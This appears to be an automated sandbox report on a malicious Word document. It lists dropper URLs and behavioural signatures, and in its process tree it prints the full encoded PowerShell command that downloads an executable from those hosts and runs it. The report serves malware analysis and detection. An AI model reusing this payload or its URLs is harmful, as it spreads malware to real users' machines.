Analysis
-
max time kernel
30s -
resource
win10v191014 -
submitted
28-01-2020 14:36
Task
task1
Sample
e849501d3e7272570fb9d8adc773b76260eecd17d2ea57f233110401a9fc17b4.doc
Resource
win10v191014
0 signatures
General
-
Target
e849501d3e7272570fb9d8adc773b76260eecd17d2ea57f233110401a9fc17b4.doc
-
Sample
200128-asd9ynh2e2
-
SHA256
e849501d3e7272570fb9d8adc773b76260eecd17d2ea57f233110401a9fc17b4
Score
10/10
Malware Config
Extracted
Language
ps1
Source
URLs
exe.dropper
http://zethler.com/cgi-bin/8k1/
exe.dropper
http://emmaurlogisticsltd.com/wp-content/wm/
exe.dropper
https://www.rimayaswimwear.com/msxnoa/dx8frn/
exe.dropper
https://aredsm.com/l4jn4/ol11/
exe.dropper
https://fashionlifestyle.net/tmp/d7so/
Signatures
-
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
WINWORD.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WINWORD.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
WINWORD.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WINWORD.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
WINWORD.EXEpid process 4888 WINWORD.EXE -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
WINWORD.EXEpid process 4888 WINWORD.EXE -
Process spawned unexpected child process 1 IoCs
Processes:
Powershell.exedescription pid pid_target process target process Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4476 5016 Powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
Powershell.exedescription pid process Token: SeDebugPrivilege 4476 Powershell.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes:
Powershell.exepid process 4476 Powershell.exe
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\e849501d3e7272570fb9d8adc773b76260eecd17d2ea57f233110401a9fc17b4.doc" /o ""1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:4888
-
C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exePowershell -w hidden -en JABFAGYAagBsAGcAdQByAGUAcQBkAGkAPQAnAFcAaQBqAG4AdQByAGcAawB2AGUAbgBoAGQAJwA7ACQAWABnAHEAbwBiAGUAYgB3AHAAZwByAG4AIAA9ACAAJwAyADIANQAnADsAJABIAGsAcQB3AGQAYwBhAGcAaABsAHIAYgB0AD0AJwBGAHcAaABmAG4AZwBzAHgAdgBzACcAOwAkAEQAdgB0AGgAZwBxAHQAcwA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAWABnAHEAbwBiAGUAYgB3AHAAZwByAG4AKwAnAC4AZQB4AGUAJwA7ACQAQgB3AGQAZABwAHgAZgBqAHQAcgA9ACcAVABpAGQAZwBpAHoAZQByAGYAcwBoAGwAJwA7ACQATABwAG4AZQByAHoAeABmAGEAPQAuACgAJwBuACcAKwAnAGUAJwArACcAdwAtAG8AYgBqAGUAYwAnACsAJwB0ACcAKQAgAG4ARQBUAC4AVwBlAEIAQwBsAEkARQBuAFQAOwAkAFAAYwBpAHQAZQBmAG0AYQBxAGQAcAB6AD0AJwBoAHQAdABwADoALwAvAHoAZQB0AGgAbABlAHIALgBjAG8AbQAvAGMAZwBpAC0AYgBpAG4ALwA4AGsAMQAvACoAaAB0AHQAcAA6AC8ALwBlAG0AbQBhAHUAcgBsAG8AZwBpAHMAdABpAGMAcwBsAHQAZAAuAGMAbwBtAC8AdwBwAC0AYwBvAG4AdABlAG4AdAAvAHcAbQAvACoAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AcgBpAG0AYQB5AGEAcwB3AGkAbQB3AGUAYQByAC4AYwBvAG0ALwBtAHMAeABuAG8AYQAvAGQAeAA4AGYAcgBuAC8AKgBoAHQAdABwAHMAOgAvAC8AYQByAGUAZABzAG0ALgBjAG8AbQAvAGwANABqAG4ANAAvAG8AbAAxADEALwAqAGgAdAB0AHAAcwA6AC8ALwBmAGEAcwBoAGkAbwBuAGwAaQBmAGUAcwB0AHkAbABlAC4AbgBlAHQALwB0AG0AcAAvAGQANwBzAG8ALwAnAC4AIgBTAFAAbABgAEkAVAAiACgAWwBjAGgAYQByAF0ANAAyACkAOwAkAEcAcwBwAG0AdQBkAHkAdAA9ACcARABpAGMAZABuAGcAcwBvAG4AbwAnADsAZgBvAHIAZQBhAGMAaAAoACQARABhAGkAYgB1AGIAagBpAGgAcQBwACAAaQBuACAAJABQAGMAaQB0AGUAZgBtAGEAcQBkAHAAegApAHsAdAByAHkAewAkAEwAcABuAGUAcgB6AHgAZgBhAC4AIgBkAG8AdwBgAE4ATABvAGAAQQBEAGYAYABJAGwARQAiACgAJABEAGEAaQBiAHUAYgBqAGkAaABxAHAALAAgACQARAB2AHQAaABnAHEAdABzACkAOwAkAEQAbABvAHcAbwBvAGQAagBwAD0AJwBQAHIAbQB0AGgAdwBmAHYAegAnADsASQBmACAAKAAoACYAKAAnAEcAZQAnACsAJwB0AC0ASQB0ACcAKwAnAGUAbQAnACkAIAAkAEQAdgB0AGgAZwBxAHQAcwApAC4AIgBsAGAARQBgAE4AZwBUAGgAIgAgAC0AZwBlACAAMgA2ADYAMgA3ACkAIAB7AFsARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgAiAHMAYABUAGEAcgB0ACIAKAAkAEQAdgB0AGgAZwBxAHQAcwApADsAJABaAHcAYQBkAHoAegBzAHgAPQAnAEIAcABkAHgAeQBwAGoAcQBxAHUAawAnADsAYgByAGUAYQBrADsAJABNAGIAbQBsAHIAaQB0AG0AdwBqAGgAPQAnAE4AbABkAGoAdwB2AHgAYQBwAHcAcQBqAHkAJwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQASgBzAHoAcwB3AGoAbgBjAG4AbwA9ACcAUABiAGUAZwB2AGkAeQBiAHkAbQBoACcA1⤵
- Process spawned unexpected child process
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
PID:4476